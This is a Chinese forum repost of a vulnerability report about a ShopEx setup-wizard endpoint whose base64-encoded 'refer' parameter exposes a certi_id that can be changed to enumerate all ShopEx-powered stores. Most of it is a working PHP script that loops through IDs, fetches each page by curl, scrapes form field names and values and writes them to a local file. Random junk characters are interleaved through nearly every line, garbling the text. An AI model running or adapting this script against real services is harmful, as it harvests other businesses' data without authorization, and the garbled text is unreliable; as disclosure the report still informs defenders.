|
|
简要描述:! r" r% n! U. X" W- R( Y4 T
ShopEx某接口缺陷,可遍历所有网站; A" _# K' e; m# V; `
详细说明:% c! E2 D a1 g2 ~/ x% e1 p0 C
问题出现在shopex 网店使用向导页面 0 a5 K7 {- ?* D
3 I+ {' P) f) @4 J
' C9 I0 f/ V5 l' g1 f
# @2 X |- A' d8 C& E' V xhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=$ R. s* e# e) j9 H2 Z# _# v. c
) X% G3 ~" B! H- H1 H2 `& w% g3 b. ^- Z j3 T' J# Z3 W
* ^4 x+ } q4 @7 _
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
% G2 C; y0 Z0 f4 I N9 Z3 ^
; G3 N# J' @3 u) `, s& F$ B2 i' ~1 X3 q0 G8 }% @- ^+ L
6 M: ^8 x/ \5 U% A# ^我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. U1 ~- [: V5 q7 ^2 I; K! x4 I- B- `2 s$ L$ i
& |; i! U: S; O# u0 H/ W c1 c+ ~ V% K) n6 h7 R
<?php# v/ M5 |( E" P- ]
& f2 G3 A! K7 V7 w/ O
for ($i=1; $i < 10000; $i++) { //遍历
# k4 u0 H u b: L; H; S) U3 Q/ W+ G9 D1 M
ShowshopExD($i);
; Z! W+ z$ S; y7 Y+ Q7 `3 R3 `' N& U& s' k* _
}
! h [+ s" k% M: U' M; {+ u6 \$ q
4 Y3 W, p3 {! ~" p. j function ShowshopExD($cid) {
- p( R& _$ f2 E+ S
3 ]' u' }2 [& S7 Y3 M) S3 T $url='http://guide.ecos.shopex.cn/step2.php'; O; ? R2 a, z) w0 t
6 K5 |5 a# O6 j @$ Y4 ^ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; f. ~! ?) I9 n; x8 W6 f
* s4 G# W9 Y: w1 _1 h+ C $url = $url.'?refer='.$refer;
/ |. o: _6 x4 p, A* w: ?
; D, W3 o6 ~$ i/ o $ch = curl_init($url);6 a T2 j; M( D/ f& m& i1 a
$ h) T, n$ J0 F6 I curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
, v6 O- Q4 H0 o a' l# s: h3 b; n% e# P7 H. D4 [! m; b5 D
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 @/ t: I9 U6 `
3 }% y/ U' o3 H/ Q$ Q- |: k $result = curl_exec($ch);
2 i# m: e; v2 \: f# Y& q% C. `5 O; ?; I# J' x4 G+ U* f) ~* d; L
$result = mb_convert_encoding($result, "gb2312", "UTF-8");6 U2 Z+ V* q" g& B& U9 L
$ W' j0 N5 g' I7 ~- ]# B/ \ if(strpos($result,$refer))
+ h2 p0 C1 Q, n% S- a% Y: m1 [4 K n2 o
{
- \, b! d; O0 Q% Y1 j$ S# _$ Q' G: L
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件9 P% z* y; _$ _
7 |7 H+ e! B0 v0 |* y preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);# v1 j9 L, I& X
6 v) X6 U9 o) R4 j* e( ~. L0 y
foreach ($value[1] as $key) {7 }# v+ F0 s( y! h* ~% E! l
9 A4 e+ @% c( P( N% Z ` H3 x
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 `* ?5 a/ C0 r( v3 d9 m. U' l7 f6 f, t
echo $res[1][0].':'.$res[3][0]."\r\n";! n5 t7 Y6 P! `- m5 I- L
6 [* |- k( n) B
$col =$res[1][0].':'.$res[3][0]."\r\n";
2 i! O* \0 j4 H% j- |' n5 E& M' b# t! J- b* X3 D* A6 ]+ w
fwrite($fp, $col, strlen($col));
; F. M: y' y4 ?7 i) G/ L2 z8 u6 H. q' [ o: E- c( n" s* [
}
* x& ]! g7 X# R( E6 i2 l2 {1 E+ N) ^
echo '--------------------------------'."\r\n";% u" A0 [/ A2 U
# T5 i' p% j8 F9 L# s
fclose($fp); : Y- }2 R6 t( T2 M G) B
( d- l7 I# d2 t" C1 }3 [% B. n }: H. e0 Z. ?8 ]6 t& X& X
$ o6 h9 Y8 d" _. w
flush();
" B' Z9 Z, {! F. O
: B9 G1 o: b8 P' x* B8 B curl_close($ch);* h% z1 ^ k9 O/ Q R1 V8 r
5 J" B/ e8 h7 w$ v }2 e/ z* @ ~( V8 T
# E3 _% w' \" l# A* h
?>
5 B( y: X0 i4 p漏洞证明:
# P$ L+ U! G( i* Q0 jhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg9 A" S7 c4 ?+ w$ }# [5 r
refer换成其他加密方式
7 d" ^9 e! R4 V' n% L. y, _3 O |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对